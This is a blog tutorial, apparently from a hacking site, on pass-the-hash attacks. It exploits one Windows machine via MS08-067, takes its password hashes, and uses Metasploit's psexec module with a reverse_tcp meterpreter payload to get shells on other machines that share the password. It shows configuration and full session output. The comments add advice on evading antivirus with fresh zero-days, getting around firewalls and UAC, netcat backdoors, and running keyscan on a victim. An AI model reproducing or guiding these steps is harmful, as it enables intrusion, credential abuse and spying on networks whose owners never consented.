• 25,450
  • +1,003
  • 2,796
Using PsEXEC with Metasploit to Login Using Password Hash

Using PsEXEC with Metasploit to Login Using Password Hash


Type: Tutorial

Level: Medium, Advanced

The main problem of people nowadays with password it's hard to remember, that's why they usually put the same password for every account and even for every device they have. For example if you're in school, university, or office when they have a lot of computer, it's impossible to give different password to every computer especially when the person who use the computer are not familiar with computer, that's why usually they use same password for all of the computer, because when there's some problem happen, the IT person will try to maintain it or remote it using template password they already provided.

In this tutorial, we will compromise one victim computer and then get their password hash, after that we log in into another computer(with the same password) by using password hash, no need to cracking the password first to plain text ๐Ÿ™‚


Requirement :

1. Metasploit Framework

2. Linux Operating System or Backtrack 5(Metasploit framework already included inside this distro)

Step By Step Using PsEXEC with Metasploit to Login Using Password Hash:

1. First of all you should have vulnerable target, and then set your payload to run meterpreter when the exploit successfully launched. You can view my previous post about meterpreter search(see on step 1). In this example I use exploit/windows/smb/ms08_067_netapi exploit.

Using PsEXEC with Metasploit to Login Using Password Hash

2. After successfully inside victim computer, we will get the password hash.

FYI : in this case I will use the username : victim and assume that all username in that place is also victim(but it's usually using username : Administrator)

using psexec with metasploit to login using password hash

3. Okay, after we get the victim password hashes, we will try to connect to another victim that "maybe" use the same password(or maybe they are in the same network :-p ). I will use psexec here and set the payload to use meterpreter reverse_tcp.

using psexec with metasploit to login using password hash

4. You can take a look what options does this exploit and payload has by running show options.

msf exploit(psexec) > show options

Module options (exploit/windows/smb/psexec):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   RHOST                       yes       The target address
   RPORT      445              yes       Set the SMB service port
   SHARE      ADMIN$           yes       The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder share
   SMBDomain  WORKGROUP        no        The Windows domain to use for authentication
   SMBPass                     no        The password for the specified username
   SMBUser                     no        The username to authenticate as

Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique: seh, thread, process, none
   LHOST                      yes       The listen address
   LPORT     4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Automatic

Information :

RHOST = remote host or target ip address

SMBPass = password hash

SMBUser = username

LHOST = our local computer use to attack

5. That's the options we need to set up and below is my configuration on my backtrack 5 box.

using psexec with metasploit to login using password hash

6. After everything is set up correctly, then launch the exploit command.

msf exploit(psexec) > exploit

[*] Started reverse handler on 
[*] Connecting to the server...
[*] Authenticating to|WORKGROUP as user 'victim'...
[*] Uploading payload...
[*] Created \hMnZxVRG.exe...
[*] Binding to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:[\svcctl] ...
[*] Bound to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:[\svcctl] ...
[*] Obtaining a service manager handle...
[*] Creating a new service (nRxylOJY - "MIkxdjvELJLYUpzSEqmpscBGIwls")...
[*] Closing service handle...
[*] Opening service...
[*] Starting the service...
[*] Removing the service...
[*] Closing service handle...
[*] Deleting \hMnZxVRG.exe...
[*] Sending stage (752128 bytes) to
[*] Meterpreter session 2 opened ( -> at 2011-07-16 01:26:24 +0800

meterpreter > shell
Process 1876 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.


Below is my screenshot :

using psexec with metasploit to login using password hash

Thats it! We're already on another computer. We successfully connect to a seperate computer with the same credentials without having to worry about cracking the password.

hope it's useful.

Share this article if you found this post was useful:

Blogger at hacking-tutorial.com. Love PHP, offensive security and web. Contact him at me[-at-]vishnuvalentino.com

See all posts by || Visit Website : http://www.vishnuvalentino.com

  • Pingback: Hacking Windows 7 SP 1 Using Java Signed Applet Social Engineering Code Execution | Vishnu Valentino Hacking Tutorial, Tips and Trick()

  • Avi Nash

    awesome post.. thanks a lot ๐Ÿ˜€

  • Amigo

    I tried everything… and no luck

    [*] Creating a new service (MpAgHiEE – “MIgX”)…
    [*] Closing service handle…
    [*] Opening service…
    [*] Starting the service…
    [-] Error: DCERPC FAULT => nca_s_fault_ndr
    [*] Exploit completed, but no session was created.

    Can you help me?

    • v4L

      what’s this? PsExec with metasploit?

      • Amigo

        Yes… (exploit/windows/smb/psexec)

        BTW… i found the problem, a firewall ๐Ÿ™

        How do you disable a firewall (not windows firewall) remotely?

        thank you for your time.

        • v4L

          I have no idea for that, there’s more than a hundred or more firewall available on the net with different behavior.

        • I encountered this problem. Turn off the fire wall remotely via Windows Maager then connect to that machine via host name. However, in a pure windows environment (YOU MUST KNOW THE PASSWORD) on the remote machine. Be aware that there are DOS commands you can use to turn off a firewall remotely, however it can not be done directly. Using pure windows tools and nothing else, it is unlikely the firewall will get turned off unless your target is using an admin account and you trick them into executing a program or batch file of sorts, but wait. If there is an antivirus program running, it will more likely stop this action. A good estimate would be that 99% of any action without more advance tools will get stopped. Experimenting in a lab of hard knocks and solving real world problems when you MUST access a remote machine in another city, state or across the world truly tests admin’s every day. What is interesting here is, there are a series of facts that have been left out that truly require a lab environment to test. I must commend the web master for bringing to lite this information, no matter how old it is. When you see something be sure to share it with your friends who are interested in the details. Understanding the details will give you a better knowledge of why.

          • v4L

            Hi James, yes all the tutorial here you need to test first in your own lab. Your analysis was correct, because most of AV will catch it as a virus. If you want some exploit that not detected by antivirus, maybe you can find exploit with zeroday status and it just fresh come out from the oven, so you need to run fast before the AV detect it.
            Because every exploit or vulnerability that come out or being written in the internet all the human(who use internet) in this world will see that information, including the antivirus company that will be ended with “patch” of that exploit and vulnerability.

  • Hello ,Good Morning

    I need the help from you . For now i had a hard problem in Windows 7UAC.

    The details as following :

    I used msf/scanner/smb/smb_login in, i found USENAME : administrator , PASS WORD : 1234qwer.

    Then i wan to link in my goal (windows 7(6.1.7601 Service Pack 1 Build 7601) ) . But i have to create the shell or use psexec. It is great pity that it is not work because UAC reason.

    Can you tell me how to create the shell or upload payload ?Many thanks for your help in advance

    • v4L

      you can view the tutorial here : http://www./tips-and-trick/13-metasploit-meterpreter-file-system-command-you-should-know/ or here http://www./hacking-tutorial/10-steps-to-use-netcat-as-a-backdoor-in-windows-7-system/

  • This week and last I did some extensive work with psexec and discovered while at work in a secured environment (Antivirus) has to be turned off and to remote execute the share has to be active and you have to be admin on both machines or submit a password for using an account on the remote machine. I believe everything we learn here requires a network with no antivirus software activated because in the real world or at least my world, some of these things will not work. Unless your antivirus program is AVG- I’m just sayin~

  • alijanlou

    hi, i have one question,
    when i am using /windows/smb/ms08_067_netapi exploit
    and payload windows/shell/reverse_tcp, after complete exploit i have 1 session an shell of target system, my question is: how can use session for keyscan? (how can exit shell and use other command?)

    • v4L


      use ‘background’

      The ‘background’ command will send the current Meterpreter session to the background and return you to the msf prompt. To get back to your Meterpreter session, just interact with it again.